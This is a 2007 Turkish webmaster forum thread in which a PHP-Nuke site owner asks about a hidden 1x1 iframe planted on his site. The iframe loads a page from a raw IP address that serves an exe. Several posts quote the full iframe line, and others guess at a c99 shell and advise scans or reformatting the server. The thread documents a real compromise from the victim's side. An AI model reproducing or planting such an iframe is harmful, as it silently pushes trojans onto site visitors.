Kayıt: Jun 13, 2006 Mesajlar: 56 Konum: nereye :-D
Tarih: 2007-05-17, 19:21:20 Mesaj konusu: Bu Kod Nedir?
selamün aleyküm arkadaşlar.Sitemde iletişim formunda bi değişiklik yapmak istedim yaptım en alta indim bi baktım bi kod gözüme belirdi
Kod:
<i f r a m e src='http://81.95.149.26/logo/index.php' width='1' height='1' style='visibility: hidden;'></i f r a m e>
bi siteden iframela bişe çağrılıyor ama ne velhasıl tıkladım exe uzantılı birşey kaydetti çalıştırdım ve pc kapanıp resetledi.Bu kod php nuke ye ait bir kodmu yoksa bizim sistemimize başkası tarafından eklenen bir kodmu yardımlarınız için şimdiden teşekkürler
Kayıt: Jun 13, 2006 Mesajlar: 56 Konum: nereye :-D
Tarih: 2007-05-17, 20:39:37 Mesaj konusu: Re: Bu Kod Nedir?
bafralı tamam başkası tarafından eklenen bir kod ama geçen gün bir açık yüzünden hosta sızmışlardı bu i f r a m e bi exe dosyasını açıyor acaba diyorum bu exe dosyası keylog çalan türden bişey olmasın çünkü bugünlerde prorat ve proagent ile virüs yapılıyor ve html ye dönüştürülüp bak bu benim sitem deyip millete yutturuluyor.Benim korkum başka dosyalarada bulaştımıki
Kayıt: Mar 16, 2006 Mesajlar: 1640 Konum: Bende Bilmiyorum !
Tarih: 2007-05-18, 00:25:17 Mesaj konusu:
O zman dosyalarını tek tek kontrol edeceksin yada panelinden virüs taraması yaptıracaksın yada hostunla görüşceksin belki serverden sızmış olabilirler benimde başıma gelmişti bir kere ne diyeyim kolay gelsin saygılar ....
Kayıt: Jun 13, 2006 Mesajlar: 56 Konum: nereye :-D
Tarih: 2007-05-19, 22:59:41 Mesaj konusu: Re: Bu Kod Nedir?
Kod:
<i f r a m e src='http://81.95.149.26/logo/index.php' width='1' height='1' style='visibility: hidden;'></i f r a m e>
arkadaşlar bu nedir bana lütfen yardımcı olun bu kodu siliyorum yeniden giriyor bulaşıyor google da aradım sadece ip adresiyle ilgili bi kaç kayıtlı site var virüs falan diyor ama ispanyolca sanırım pek anlamadım yardımcı olursanız sevinirim
Kayıt: Jun 13, 2006 Mesajlar: 56 Konum: nereye :-D
Tarih: 2007-05-20, 09:36:51 Mesaj konusu: Re: Bu Kod Nedir?
sercan sağolda hostun kontrol panelinde virüs taraması yapacak bi yer yok bilgisayarlarımda nod32 kurulu şuana kadar hiç bi sorunumda olmadı şöyle bişey düşün bilgisayarımdaki dosyaya bakıyorum o kod orada yok temiz bi şekilde hosta atıyorum.Şak kod gene girmiş bilgisayardan olan bişey değil heralde ama hostta nasıl virüs taraması yaptırabilirimki kontrol panelinde tarama falan görmedim çünkü hiç
Tarih: 2007-05-20, 10:15:20 Mesaj konusu: Re: Bu Kod Nedir?
nurikamasonic :
Kod:
<i f r a m e src='http://81.95.149.26/logo/index.php' width='1' height='1' style='visibility: hidden;'></i f r a m e>
arkadaşlar bu nedir bana lütfen yardımcı olun bu kodu siliyorum yeniden giriyor bulaşıyor google da aradım sadece ip adresiyle ilgili bi kaç kayıtlı site var virüs falan diyor ama ispanyolca sanırım pek anlamadım yardımcı olursanız sevinirim
Siten Nuke'mi_? Nerden Indirdin? Hangi Modüller Var Sitende? Önce BunLarı 1 CevapLa Sonra Ben Sana Ne Oldugunu SöyLeyeyim
Kayıt: Jun 13, 2006 Mesajlar: 56 Konum: nereye :-D
Tarih: 2007-05-20, 10:28:56 Mesaj konusu: Re: Bu Kod Nedir?
1 hafta önce site sızmışlar o sırada hosttan dosya siliyodumki öle farkettim siteye dokunmadığını söyledi msn ekledim açığı sordum sölemedi coppermine vardı sildim hala açık var dedi.neyse sitemdeki modüller nukedeki bütün modüller vardı search modülünü zaten sitemden silmiştim yani bütün modülller var artı olara eklediklerim
fıkralar + flash mp3 player + güzel söz + hikaye + mailing list + medyalar modülü(tn multimedia edit) + power nukedeki müzikler modülü + shoutbox + site içerik + şiir + videolar + who + youtube + nsn news + ekip galerisi vardı coppermine vardı kaldırdım çocuk hala açık var dedi sitede imagevue galeri var ama onun zaten admin ve upload yapılan kısmını silmiştim ftp den resim ekliyodum başka ne olabilirki hacklenecek yer hackertrap kurulu admin koruma vardı forumda resim gönderme ve httpden resim gösterme kapalıydı forum 2.0.14 tü sürümü ama yani direkt ftp ye sızmışlar serverdaki bütün sitelerde açık var dedi server güzel dedi dosya atlama yapmıyor dedi herhalde c99 attı bi hosta yada bizim htacces bi işe yaramadı tahminimce güzel bi htacces öneriside alabilirim çünkü kolay kolay bi açık yoktu
Tarih: 2007-05-20, 10:37:43 Mesaj konusu: Re: Bu Kod Nedir?
nurikamasonic :
1 hafta önce site sızmışlar o sırada hosttan dosya siliyodumki öle farkettim siteye dokunmadığını söyledi msn ekledim açığı sordum sölemedi coppermine vardı sildim hala açık var dedi.neyse sitemdeki modüller nukedeki bütün modüller vardı search modülünü zaten sitemden silmiştim yani bütün modülller var artı olara eklediklerim
fıkralar + flash mp3 player + güzel söz + hikaye + mailing list + medyalar modülü(tn multimedia edit) + power nukedeki müzikler modülü + shoutbox + site içerik + şiir + videolar + who + youtube + nsn news + ekip galerisi vardı coppermine vardı kaldırdım çocuk hala açık var dedi sitede imagevue galeri var ama onun zaten admin ve upload yapılan kısmını silmiştim ftp den resim ekliyodum başka ne olabilirki hacklenecek yer hackertrap kurulu admin koruma vardı forumda resim gönderme ve httpden resim gösterme kapalıydı forum 2.0.14 tü sürümü ama yani direkt ftp ye sızmışlar serverdaki bütün sitelerde açık var dedi server güzel dedi dosya atlama yapmıyor dedi herhalde c99 attı bi hosta yada bizim htacces bi işe yaramadı tahminimce güzel bi htacces öneriside alabilirim çünkü kolay kolay bi açık yoktu
bak arkadaşım o kod'da ne var biliomusun XSS c o o k i e var oraya tıklayana otomatik trojan bulasıyor http://whois.domaintools.com/81.95.149.26
Panamadan 1 Server Ip Numarası ßu serverinize shell bulaşmış %100 .htacces'lik bi durum yok ßence servere format atsınlar muhtemelen sunucuya virüs bulaşmış aynı sorunu yaşadım ve format attım ßi Sorun KaLmadı
100% virus dosyalarınızı tek tek açın bakın hepsinde bu koddan vardır :) ftpye yenıleyın ve indirdiğinz nuke paketini sadece php nuke resmi sitesinden indirin
Tarih: 2007-06-10, 11:39:53 Mesaj konusu: Merhaba arkadaşlar bu i f r a m e benimde 12 adet siteme girdi
Bu bir virüs ve benim tüm sitelerim asp ile html ile yapılmış web siteleri ne yapdıysam gitmedi ve rezalet bir şey tüm siteleri yeniden yapıyorum yayındaki siteleri kaldırdım yoksa siteyi her ziayaret edene mutlaka trojan giriyor ve sitenizin hakkında olumsuz düşünce yaratıyor bu virüsü çıkaranın Allah belasını versin.Üstelik serverlar sıkı korumalı ama dikkat edin googleda bile bu ıp mevcut sakın girmeyin gerçi googleda bu site bilgisayarınıza zarar veriebilir diye ibarede var
Bu forumda yeni başlıklar açamazsınız Bu forumdaki başlıklara cevap veremezsiniz Bu forumdaki mesajlarınızı değiştiremezsiniz Bu forumdaki mesajlarınızı silemezsiniz Bu forumdaki anketlerde oy kullanamazsınız
Arama
Rütbeliler
Profil
Giriş
